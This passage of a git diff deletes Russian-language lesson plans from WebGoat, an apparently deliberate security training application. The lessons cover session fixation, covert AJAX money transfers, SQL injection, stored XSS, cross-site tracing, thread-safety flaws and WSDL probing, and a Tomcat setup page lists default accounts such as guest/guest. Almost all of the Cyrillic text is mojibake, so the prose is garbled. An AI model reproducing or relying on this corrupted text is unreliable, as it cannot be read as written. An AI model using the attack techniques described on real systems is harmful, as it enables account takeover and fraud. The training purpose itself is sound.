-Через компонент XHR можно отправлÑть Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð»Ð¸ÑˆÑŒ на тот Ñервер, Ñ ÐºÐ¾Ñ‚Ð¾Ñ€Ð¾Ð³Ð¾ была загружена текущаÑ
-Ñтраница. Попытки отправить Ð·Ð°Ð¿Ñ€Ð¾Ñ Ð½Ð° другой Ñервер потерпÑÑ‚ неудачу. ";
diff --git a/src/main/webapp/lesson_plans/ru/SessionFixation.html b/src/main/webapp/lesson_plans/ru/SessionFixation.html
deleted file mode 100644
index 4d70c976e..000000000
--- a/src/main/webapp/lesson_plans/ru/SessionFixation.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
Ðазвание урока: Закрепление ÑеÑÑии
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-ИÑпользование атак клаÑÑа 'Закрепление ÑеÑÑии'
-
-
-
-Как работает данный вид атак:
-
-Сервер может опознать конкретного Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð¿Ð¾ уникальному идентификатору ÑеÑÑии.
-Ðто позволÑет клиентам проходить поцедуру авторизации вÑего 1 раз, а затем уже обращатьÑÑ Ðº
-приложению как авторизированное лицо. Ð’ некоторых приложениÑÑ… идентификатор ÑеÑÑии
-передаётÑÑ Ð² ÑÑылках, в качеÑтве одного из параметров GET-запроÑа. ЗдеÑÑŒ и начинаютÑÑ Ð³Ð»Ð°Ð²Ð½Ñ‹Ðµ проблемы.
-
-Ðтакующий может поÑлать жертве гипер-ÑÑылку Ñодеращую в Ñебе любой
-идентификатор ÑеÑÑии. Ðто может быть Ñделано, например, через почтовое
-Ñообщение, которое выглÑдит как обращение админиÑтрации Ñайта.
-Когда жертва, кликнув по ней, попадёт на Ñайт и пройдёт авторизацию, то идентификатор ÑеÑÑии, выбранный
-злоумышленником, Ñтанет идентификатором авторизованного пользователÑ-жертвы.
-Ðтакующий может пройти по любой ÑÑылке передав Ñерверу Ñтот же идентификатор,
-и Ñможет дейÑтвовать от чужого имени.
-
-ОÑновные цели и задачи:
-
-Урок имеет неÑколько Ñтадий. Ð’Ñ‹ играете роль и атакующего и жертвы.
-К концу урока вы поймёте что передача идентификаторов ÑеÑÑий в ÑÑылках
-ÑвлÑетÑÑ Ð¾Ñ‡ÐµÐ½ÑŒ плохой практикой.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/SilentTransactions.html b/src/main/webapp/lesson_plans/ru/SilentTransactions.html
deleted file mode 100644
index d1d15675d..000000000
--- a/src/main/webapp/lesson_plans/ru/SilentTransactions.html
+++ /dev/null
@@ -1,27 +0,0 @@
-
-
Ðазвание урока: Ðтаки ÑвÑзанные Ñо Ñкрытыми операциÑми.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Ðа данном уроке вы поймёте как оÑущеÑтвлÑÑŽÑ‚ÑÑ Ð°Ñ‚Ð°ÐºÐ¸ ÑвÑзанные Ñо Ñкрытыми операциÑми.
-
-
-
-Как работают атаки такого рода:
-
-Ðекоторые Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¿Ñ€Ð¾Ð¸Ð·Ð²Ð¾Ð´ÑÑ‚ манипулÑции Ñ Ñ‡ÑƒÐ²Ñтвительными пользовательÑкими данными (например Ñ Ð´ÐµÐ½ÑŒÐ³Ð°Ð¼Ð¸)
-в Ñкрытом виде еÑли получат разрешение на Ñто Ñ…Ð¾Ñ‚Ñ Ð±Ñ‹ один раз. Ðто таит множеÑтво опаÑноÑтей.
-Ðапример, в проÑтом веб-приложении Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб от имени клиента обратитьÑÑ Ðº любому URL необходимо
-получить его идентификатор ÑеÑÑии (или другие данные, которые обеÑпечат необходимую идентификацию).
-Ð’ Ñлучае Ñ AJAX вÑÑ‘ намного проще: обращение к Ñерверу может проиÑходить в Ñкрытом режиме без Ð¾Ð¿Ð¾Ð²ÐµÑ‰ÐµÐ½Ð¸Ñ Ð¾Ð± Ñтом пользователÑ.
-Следовательно, внедрённый каким-либо образом в такую Ñтраницу вредоноÑный Ñкрипт может оÑущеÑтвлÑть важные
-операции Ñовершенно незаметно Ð´Ð»Ñ ÐºÐ»Ð¸ÐµÐ½Ñ‚Ð°. Ðапример переводить его деньги Ñо Ñчёта на Ñчёт.
-
-ОÑновные цели и задачи:
-
-* Ðто проÑтейшее приложение интернет-банкинга - Ñтраница перевода денег.
-* ЗдеÑÑŒ отображаетÑÑ Ñумма находÑщаÑÑÑ Ð½Ð° баланÑе, поле Ð´Ð»Ñ Ð²Ð²Ð¾Ð´Ð° аккаунта, которому деньги будут переведены, и поле
-Ð´Ð»Ñ Ñуммы перевода.
-* Приложение иÑпользует AJAX Ð´Ð»Ñ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ¸ транзакции поÑле Ð¿Ñ€Ð¾Ð²ÐµÐ´ÐµÐ½Ð¸Ñ Ñлементарной проверки данных на клиентÑкой Ñтороне.
-* Ваша цель - попробовать оÑущеÑтвить от имени Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´ÐµÐ½ÐµÐ¶Ð½Ñ‹Ð¹ перевод в Ñкрытом виде.
-
diff --git a/src/main/webapp/lesson_plans/ru/SoapRequest.html b/src/main/webapp/lesson_plans/ru/SoapRequest.html
deleted file mode 100644
index 176260bcd..000000000
--- a/src/main/webapp/lesson_plans/ru/SoapRequest.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Ðазвание урока: ОÑущеÑтвление SOAP-запроÑов
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Веб-ÑервиÑÑ‹ общаютÑÑ Ð¼ÐµÐ¶Ð´Ñƒ Ñобой Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ SOAP-запроÑов. Ðти запроÑÑ‹ отправлÑÑŽÑ‚ÑÑ
-на веб-ÑÐµÑ€Ð²Ð¸Ñ Ð¸ вызывают выполнение некоторых функций опиÑанных в WSDL-файлах.
-РаÑÑмотрим их подробнее. У WebGoat еÑть Ñвой WSDL-файл, над которым
-вы можете поÑкÑпериментировать.
-
-ОÑновные цели и задачи:
-Попробуйте ÑоединитьÑÑ Ñ WSDL Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ браузера или какой-нибудь утилиты Ð´Ð»Ñ Ñ€Ð°Ð±Ð¾Ñ‚Ñ‹ Ñ
-веб-ÑервиÑами. URL ÑервиÑа http://localhost/WebGoat/services/SoapRequest . WSDL
-может быть вызван добавлением в конец URL фразы ?WSDL.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html b/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html
deleted file mode 100644
index d8a13b346..000000000
--- a/src/main/webapp/lesson_plans/ru/SqlNumericInjection.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Ðазвание урока: Проведение чиÑловых SQL-инъекций
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-SQL-инъекции предÑтавлÑÑŽÑ‚ из ÑÐµÐ±Ñ Ð¾Ñ‡ÐµÐ½ÑŒ Ñерьёзную угрозу Ð´Ð»Ñ Ñайтов оÑнованных на БД.
-Методы их иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð´Ð¾Ñтаточно легки в оÑвоении, а ущерб Ñоздаваемый ими огромен и
-при определённых уÑловиÑÑ… может произойти к компрометации вÑей ÑиÑтемы. Тем не менее,
-количеÑтво интернет-Ñайтов Ñ ÑƒÑзвимоÑÑ‚Ñми данного типа поÑтоÑнно раÑтёт.
-
-Ðа Ñамом деле вÑегда можно избежать поÑÐ²Ð»ÐµÐ½Ð¸Ñ ÑƒÑзвимоÑтей Ñтого клаÑÑа
-еÑли в процеÑÑе напиÑÐ°Ð½Ð¸Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ð¹ Ñоблюдать общие меры предоÑторожноÑти.
-Ðапример фильтровать вÑе поÑтупающие от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ. ОÑобенно те, которые
-будут помещены в SQL-запроÑÑ‹.
-
-ОÑновные цели:
-РаÑÐ¿Ð¾Ð»Ð¾Ð¶ÐµÐ½Ð½Ð°Ñ Ð½Ð¸Ð¶Ðµ форма позволÑет пользователÑм Ñмотреть данные о погоде.
-Вам необходимо Ñ ÐµÑ‘ помощью обнаружить в теÑтовом приложении уÑзвимоÑть.
-Ð”Ð»Ñ Ð¿Ð¾Ð´Ñказки чуть ниже выводитÑÑ Ð¸Ñ‚Ð¾Ð³Ð¾Ð²Ñ‹Ð¹ запроÑ, который получаетÑÑ Ð½Ð°
-Ñтороне Ñервера.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/SqlStringInjection.html b/src/main/webapp/lesson_plans/ru/SqlStringInjection.html
deleted file mode 100644
index 4b329edea..000000000
--- a/src/main/webapp/lesson_plans/ru/SqlStringInjection.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Ðазвание урока: Как иÑпользовать Ñтроковые SQL-инекции
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-SQL-инъекции предÑтавлÑÑŽÑ‚ из ÑÐµÐ±Ñ Ð¾Ñ‡ÐµÐ½ÑŒ Ñерьёзную угрозу Ð´Ð»Ñ Ñайтов оÑнованных на БД.
-Методы их иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð´Ð¾Ñтаточно легки в оÑвоении, а ущерб Ñоздаваемый ими огромен и
-при определённых уÑловиÑÑ… может произойти к компрометации вÑей ÑиÑтемы. Тем не менее,
-количеÑтво интернет-Ñайтов Ñ ÑƒÑзвимоÑÑ‚Ñми данного типа поÑтоÑнно раÑтёт.
-
-Ðа Ñамом деле вÑегда можно избежать поÑÐ²Ð»ÐµÐ½Ð¸Ñ ÑƒÑзвимоÑтей Ñтого клаÑÑа
-еÑли в процеÑÑе напиÑÐ°Ð½Ð¸Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ð¹ Ñоблюдать общие меры предоÑторожноÑти.
-Ðапример фильтровать вÑе поÑтупающие от Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ. ОÑобенно те, которые
-будут помещены в SQL-запроÑÑ‹.
-
-
-ОÑновные цели и задачи:
-РаÑÐ¿Ð¾Ð»Ð¾Ð¶ÐµÐ½Ð½Ð°Ñ Ð½Ð¸Ð¶Ðµ форма позволÑет пользователÑм проÑматривать их номера кредитных карт.
-Попробуйте внеÑти SQL-выражение в поле фамилии. ПоÑле отправки формы вы чуть ниже увидите итоговый
-SQL-запроÑ, который ÑформируетÑÑ Ð² приложении. Ð’ качеÑтве Ñамой фамилии иÑпользуйте 'Smith'.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/StoredXss.html b/src/main/webapp/lesson_plans/ru/StoredXss.html
deleted file mode 100644
index 8d0b9e06e..000000000
--- a/src/main/webapp/lesson_plans/ru/StoredXss.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Ðазвание урока: Проведение хранимых XSS
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Хорошей практикой вÑегда ÑчиталаÑÑŒ очиÑтка вÑех входÑщих данных, оÑобенно когда
-их Ñодержимое будут иÑпользовано в качеÑтве команд ОС, Ñкриптов или запроÑов к
-БД. Ðто важно и Ð´Ð»Ñ Ñ‚ÐµÑ… данных, которые будут Ñохранены где-то
-внутри приложениÑ. ПоÑетители не должны иметь возможноÑть публикации на Ñайте
-таких Ñообщений, которые могут изменÑть Ñтруктуру Ñтраницы при их проÑмотре.
-
-ОÑновные цели и задачи:
-Ð’Ñ‹ должны добавить такое Ñообщение, которое при проÑмотре другим пользователем будет формировать
-на данной Ñтранице поддельное Ñодержимое.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html b/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html
deleted file mode 100644
index c10a9b044..000000000
--- a/src/main/webapp/lesson_plans/ru/ThreadSafetyProblem.html
+++ /dev/null
@@ -1,35 +0,0 @@
-
-
-
-
-
- План урока
-
-
-
-
-
Ðазвание урока: Как ÑкÑплуатировать проблемы одновременной работы неÑкольких потоков.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Веб-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð³ÑƒÑ‚ обрабатывать множеÑтво HTTP-запроÑов одновременно.
-ЧаÑто разработчики иÑпользуют конÑтрукции не приÑпоÑобленные к многопоточной работе, и
-Ñто Ñоздаёт возможноÑть иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¾ÑˆÐ¸Ð±Ð¾Ðº ÑвÑзанных Ñ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ñ‹Ð¼Ð¸ обращениÑми.
-Ðапример когда одна и та же Ñтраница открываетÑÑ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ð¾ разными пользователÑми и один их них видит
-на ней данные другого.
-Под приÑпоÑобленноÑтью к многопоточной работе подразумеваетÑÑ ÑпоÑобноÑть полей клаÑÑов и объектов
-вÑегда находитьÑÑ Ð² верном ÑоÑтоÑнии при выполнении множеÑтва одних и тех же операций вызываемых
-разными потоками. ПоÑкольку вÑе потоки иÑпользуют одно и то же рабочее проÑтранÑтво вызываемых методов, и в данном
-проÑтранÑтве хранÑÑ‚ÑÑ Ð´Ð°Ð½Ð½Ñ‹Ðµ вÑех ÑвойÑтв отдельно взÑтых клаÑÑов, то множеÑтвенные одновременные попытки
-обращений к ним могут привеÑти к неожиданным результатам.
-
-
-ОÑновные цели:
-Ð’ приложении урока пользователь может воÑпользоватьÑÑ ÑƒÑзвимоÑтю данного типа Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтобы проÑматривать
-авторизационные данные другого пользователÑ, еÑли одновременно Ñ Ð½Ð¸Ð¼ попытаетÑÑ Ð²Ñ‹Ð·Ð²Ð°Ñ‚ÑŒ одну
-и ту же функцию.
-ЗдеÑÑŒ вам придётÑÑ Ð¸Ñпользовать два браузера .
-
-
-
diff --git a/src/main/webapp/lesson_plans/ru/TomcatSetup.html b/src/main/webapp/lesson_plans/ru/TomcatSetup.html
deleted file mode 100644
index b125e4a24..000000000
--- a/src/main/webapp/lesson_plans/ru/TomcatSetup.html
+++ /dev/null
@@ -1,110 +0,0 @@
-
-ÐаÑтройка Tomcat
-Введение
-WebGoat раÑпроÑтранÑетÑÑ Ñ ÐºÐ¾Ð½Ñ„Ð¸Ð³ÑƒÑ€Ð°Ñ†Ð¸ÐµÐ¹ Tomcat по умолчанию. Ðа данной Ñтранице вы найдёте её короткое опиÑание и
-ÑпиÑок возможных вариантов различных наÑтроек. Ð’ ÑлучаÑÑ… когда данное опиÑание вам не помогает обращайтеÑÑŒ к официальной
-документации Tomcat.
-Кроме того, нужно Ñказать что вÑÑ‘ нижеопиÑанное отноÑитÑÑ Ðº Ñтандартной конфигурации Ñервера работающего на 80-ом порту.
-ЕÑли вы иÑпользуете Ð´Ð»Ñ Ñервера другой порт, то вам необходимо будет изменить конфигурацию ÑоответÑтвующим образом.
-
-
-Ð¡Ñ‚Ð°Ð½Ð´Ð°Ñ€Ñ‚Ð½Ð°Ñ ÐºÐ¾Ð½Ñ„Ð¸Ð³ÑƒÑ€Ð°Ñ†Ð¸Ñ
-ЗдеÑÑŒ имеетÑÑ Ð´Ð²Ðµ Ñтандартных конфигурации Tomcat. При их иÑпользовании доÑтуп к Ñерверу можно получить обращаÑÑÑŒ к хоÑту localhost.
-Они полноÑтью идентичны, за иÑключением того что в первом Ñлучае ÑервиÑÑ‹ Tomcat запуÑкаютÑÑ Ð½Ð° портах 80 и 443 (SSL), а во втором -
-на портах 8080 и 8443. Ð’ Linux вы должны запуÑтить WebGoat как root или Ñ Ð¸Ñпользованием sudo еÑли хотите чтоб он работал на портах
-80 и 443.
-Помните, что запуÑк ПО из под root`а очень опаÑное занÑтие, поÑтому мы наÑтоÑтельно рекомендуем иÑпользовать порты 8080 и 8443.
-Ð’ Windows вы можете запуÑтить WebGoat.bat Ð´Ð»Ñ Ñ€Ð°Ð±Ð¾Ñ‚Ñ‹ на 80-ом порту, или же WebGoat_8080.bat Ð´Ð»Ñ Ñ€Ð°Ð±Ð¾Ñ‚Ñ‹ на порту 8080.
-Ð’ Linux ту же Ñамую работу выполнÑет Ñкрипт WebGoat.sh и Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ же результата его необходимо запуÑтить либо командой
-"webgoat.sh start80", либо "webgoat.sh start8080". Пользователь, Ð´Ð»Ñ Ð´Ð¾Ñтупа к приложению,
-в Ñтандартной конфигурации - guest Ñ Ð¿Ð°Ñ€Ð¾Ð»ÐµÐ¼ guest.
-
-
-ÐаÑтройка Ñервера
-
-ЕÑли вы единÑтвенный кто будет иÑпользовать WebGoat, то Ñтандартной конфигурации вам
-будет вполне доÑтаточно. ЕÑли же вы будете запуÑкать его в лаборатории или клаÑÑе, то конфигурацию
-нужно будет менÑть. Перед Ñтим Ñоветуем вам Ñделать её резервную копию.
-
-
-Изменение портов
-
- Ð”Ð»Ñ Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ Ð¿Ð¾Ñ€Ñ‚Ð¾Ð² откройте файл server_80.xml, котрый можно найти в tomcat/conf, и измените
- не-SSL порт. Ðапример, еÑли вы хотите иÑпользовать порт 8079:
-
-
-
- <!-- Define a non-SSL HTTP/1.1 Connector on port 8079 -->
- <Connector address="127.0.0.1" port="8079"...
-
-
-Конечно же вы можете изменить и порт SSL-ÑоединениÑ. Вот пример переноÑа SSL на порт 8442:
-
-
- <!-- Define a SSL HTTP/1.1 Connector on port 8442 -->
- <Connector address="127.0.0.1" port="8442"...
-
-
-
-Делаем WebGoat доÑтупным Ð´Ð»Ñ Ð½ÐµÑкольких клиентов.
-ÐТО ОТКРЫВÐЕТ Ð’ÐШ СЕРВЕРДЛЯ РЕÐЛЬÐЫХ ÐТÐК ИЗ Ð’ÐЕ! ÐЕ ДЕЛÐЙТЕ ÐТОГО ЕСЛИ ВЫ ÐÐ 100%
- ÐЕ УВЕРЕÐЫ Ð’ ÐЕОБХОДИМОСТИ ДÐÐÐОГО ШÐГÐ. ÐТРКОÐФИГУРÐЦИЯ МОЖЕТ БЫТЬ ИСПОЛЬЗОВÐÐРТОЛЬКО
- Ð’ ДОВЕРЕÐÐЫХ СЕТЯХ.
-
-По умолчанию WebGoat доÑтупен только при обращении к хоÑту localhost. Ð’ лаборатории или клаÑÑе
-у Ð²Ð°Ñ Ð¼Ð¾Ð¶ÐµÑ‚ возникнуть необходимоÑть организовать Ñервер Ñ Ð¼Ð½Ð¾Ð¶ÐµÑтвом клиентов. Ð’ данном Ñлучае
-вы можете наÑтроить WebGoat ÑоответÑтвующим образом.
-
-Причина того что WebGoat доÑтупен только на localhost - параметр address тега Connector в файле server_80.xml.
- Изначально его значение уÑтановлено в 127.0.0.1 . При запуÑке приложение начинает проверÑть пропиÑанные в наÑтройках порты
- только на Ñтом адреÑе и принимает ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ ÐµÑли они поÑвлÑÑŽÑ‚ÑÑ. ЕÑли вы удалите данный параметр, то приложение
- начнёт проÑлушивать ÑоответÑтвующие порты на вÑех доÑтупных IP-адреÑах.
-
-
-Разрешение Ñоединений только от определённых клиентов
-
-Выше опиÑывалÑÑ ÑпоÑоб Ñ€Ð°Ð·Ñ€ÐµÑˆÐµÐ½Ð¸Ñ Ñоединений Ñ WebGoat Ð´Ð»Ñ Ð»ÑŽÐ±Ñ‹Ñ… клиентов.
-ЕÑли вы хотите разрешить доÑтуп к приложению только Ñ Ð¾Ð¿Ñ€ÐµÐ´ÐµÐ»Ñ‘Ð½Ð½Ñ‹Ñ… адреÑов, воÑпользуйтеÑÑŒ
-фильтром удалённых адреÑов (Remote Address Filter). Ð”Ð»Ñ Ñтого добавьте Ñледующюю Ñтроку
-в файл web_80.xml:
-
-
- <Valve className="org.apache.catalina.valves.RemoteAddrValve"
- allow="127.0.0.1,ip1,ip2"/>
-
-Ð’ Ñтом Ñлучае только localhost, ip1 и ip2 Ñмогут уÑтанавливать ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ Ñ Ñервером.
-
-Стандартные пользователи WebGoat и роли Ð´Ð»Ñ Tomcat
-
-WebGoat`у Ð´Ð»Ñ Ð½Ð¾Ñ€Ð¼Ð°Ð»ÑŒÐ½Ð¾Ð¹ работы необходимо наличие Ñледующих пользователей и ролей:
-
-
- >role rolename="webgoat_basic"/<
- >role rolename="webgoat_admin"/<
- >role rolename="webgoat_user"/<
- >user username="webgoat" password="webgoat" roles="webgoat_admin"/<
- >user username="basic" password="basic" roles="webgoat_user,webgoat_basic"/<
- >user username="guest" password="guest" roles="webgoat_user"/<
-
-
-Добавление пользователей
-
-Обычно Ð´Ð»Ñ Ð½Ð¾Ñ€Ð¼Ð°Ð»ÑŒÐ½Ð¾Ð¹ работы Ñ WebGoat вам доÑтаточно будет Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ guest Ñ Ð¿Ð°Ñ€Ð¾Ð»ÐµÐ¼ guest.
-Ðо когда вы развернёте его в лоборатории или клаÑÑе может возникнуть необходимоÑть ÑÐ¾Ð·Ð´Ð°Ð½Ð¸Ñ Ð¾Ñ‚Ð´ÐµÐ»ÑŒÐ½Ð¾Ð³Ð¾
-Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ клиента. Ð”Ð»Ñ Ñтого вам необходимо изменить файл tomcat-users.xml, которых находитÑÑ Ð² tomcat/conf.
-Мы наÑтоÑтельно не рекомендуем хранить реальные дейÑтвующие пароли в данном файле Ñ‚.к.
-там они пропиÑываютÑÑ Ð² виде проÑтого текÑта!
-
-Добавление пользователÑ
-
- Процедура Ð´Ð¾Ð±Ð°Ð²Ð»ÐµÐ½Ð¸Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð¾Ñ‡ÐµÐ½ÑŒ проÑта. Ð’ качеÑтве наглÑдного примера вы можете иÑпользовать
- Ñтроку Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¼ guest. Помните что каждый вновь добавлÑемый пользователь должен иметь определённую роль.
- Ð”Ð»Ñ Ð´Ð¾Ð±Ð°Ð²Ð»ÐµÐ½Ð¸Ñ Ð½Ð¾Ð²Ñ‹Ñ… аккаунтов впишите в вышеуказанный файл Ñтроки типа Ñтих:
-
-
- <user name="student1" password="password1" roles="webgoat_user"/>
- <user name="student2" password="password2" roles="webgoat_user"/>
- ...
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/TraceXSS.html b/src/main/webapp/lesson_plans/ru/TraceXSS.html
deleted file mode 100644
index 08168f249..000000000
--- a/src/main/webapp/lesson_plans/ru/TraceXSS.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Ðазвание урока: Проведение XST-атак (Cross Site Tracing/Trace-XSS)
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Хорошей практикой вÑегда ÑчиталаÑÑŒ очиÑтка вÑех входÑщих данных, оÑобенно когда
-их Ñодержимое будут иÑпользовано в качеÑтве команд ОС, Ñкриптов или запроÑов к
-БД. Ðто важно и Ð´Ð»Ñ Ñ‚ÐµÑ… данных, которые будут Ñохранены где-то
-внутри приложениÑ. ПоÑетители не должны иметь возможноÑть публикации на Ñайте
-таких Ñообщений, которые могут изменÑть Ñтруктуру Ñтраницы при их проÑмотре.
-ОÑновные цели:
-Tomcat наÑтроен на поддержку команды HTTP TRACE. Ваша цель Ñ ÐµÑ‘ помощью оÑущеÑтвить
-XST-нападение.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/UncheckedEmail.html b/src/main/webapp/lesson_plans/ru/UncheckedEmail.html
deleted file mode 100644
index 0b70a3f27..000000000
--- a/src/main/webapp/lesson_plans/ru/UncheckedEmail.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Ðазвание урока: ИÑпользование непроверÑемых почтовых Ñообщений
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Многие Ñайты позволÑÑŽÑ‚ не аутентифицированным пользователÑм отправлÑть почтовые
-ÑÐ¾Ð¾Ð±Ñ‰ÐµÐ½Ð¸Ñ Ñвоим "друзьÑм". Такие Ñайты предÑтавлÑÑŽÑ‚ из ÑÐµÐ±Ñ Ñ…Ð¾Ñ€Ð¾ÑˆÐ¸Ð¹ инÑтрумент
-Ð´Ð»Ñ Ñпамеров, которые получают возможноÑть Ñлать рекламу Ñ Ð¸Ñпользованием
-почтового Ñервера компании.
-
-ОÑновные цели и задачи:
-Пользователь должен отоÑлать любое почтовое Ñообщение.
diff --git a/src/main/webapp/lesson_plans/ru/UsefulTools.html b/src/main/webapp/lesson_plans/ru/UsefulTools.html
deleted file mode 100644
index 74bfe257d..000000000
--- a/src/main/webapp/lesson_plans/ru/UsefulTools.html
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-ИÑпользуемые инÑтрументы
-
-Ðиже находитÑÑ ÑпиÑок инÑтрументов, которые, по нашему мнению, могут вам пригодитьÑÑ Ð¿Ñ€Ð¸ прохождении уроков WebGoat.
-Ð”Ð»Ñ Ð²Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ Ð±Ð¾Ð»ÑŒÑˆÐ¸Ð½Ñтва заданий вам понадобитÑÑ WebScarab или Paros.
-WebScarab:
-
-Как и WebGoat, WebScarab - Ñто чаÑть OWASP. Он предÑтавлÑет из ÑÐµÐ±Ñ Ð¿Ñ€Ð¾ÐºÑи-Ñервер
-Ð´Ð»Ñ Ð¸ÑÑÐ»ÐµÐ´Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ð¹ иÑпользующих протоколы HTTP и HTTPS. Так как WebScarab
-ÑвлÑетÑÑ Ð¿ÐµÑ€ÐµÑ…Ð²Ð°Ñ‚Ñ‹Ð²Ð°ÑŽÑ‰Ð¸Ð¼ прокÑи-Ñервером, то мы Ñ ÐµÐ³Ð¾ помощью можем проÑматривать и изменÑть
-Ñодержимое запроÑов и ответов на них.
-
-
-Его Ñтраничка:http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
-
-Firebug:
-
-Firebug - Ñто дополнение к браузеру Firefox. Мы можем иÑпользовать его Ð´Ð»Ñ Ð¿Ñ€Ð¾Ð²ÐµÑ€ÐºÐ¸, Ñ€ÐµÐ´Ð°ÐºÑ‚Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¸ мониторинга CSS, HTML и JavaScript.
-
-Его Ñтраничка:http://www.getfirebug.com
-
-
IEWatch:
-
-IEWatch - Ñто утилита Ð´Ð»Ñ Ð°Ð½Ð°Ð»Ð¸Ð·Ð° HTTP и HTML Ð´Ð»Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¹ Internet Explorer.
-
-Её Ñтраничка:http://www.iewatch.com
-
-Wireshark
-
-Wireshark - Ñто анализатор Ñетевого трафика. С его помощью вы можете отлавливать Ñетевой трафик и получать из него интереÑную информацию.
-
-Его Ñтраничка:http://www.wireshark.org
-
-
-
-Сканнер:
-
-Ð’ данный момент имеетÑÑ Ð±Ð¾Ð»ÑŒÑˆÐ¾Ðµ количеÑтво Ñканеров Ð´Ð»Ñ Ð²ÐµÐ±-приложений. Они могут находить XSS, инъективные и другие уÑзвимоÑти.
-Ðиже предÑтавлены ÑÑылки на два Ñканера Ñ Ð¾Ñ‚ÐºÑ€Ñ‹Ñ‚Ñ‹Ð¼ иÑходным кодом.
-
-Nessus:http://www.nessus.org
-Paros:http://www.parosproxy.org
-
-
-
diff --git a/src/main/webapp/lesson_plans/ru/WSDLScanning.html b/src/main/webapp/lesson_plans/ru/WSDLScanning.html
deleted file mode 100644
index 3cf7105aa..000000000
--- a/src/main/webapp/lesson_plans/ru/WSDLScanning.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Ðазвание урока: ОÑущеÑтвление WSDL-ÑканиорваниÑ
-
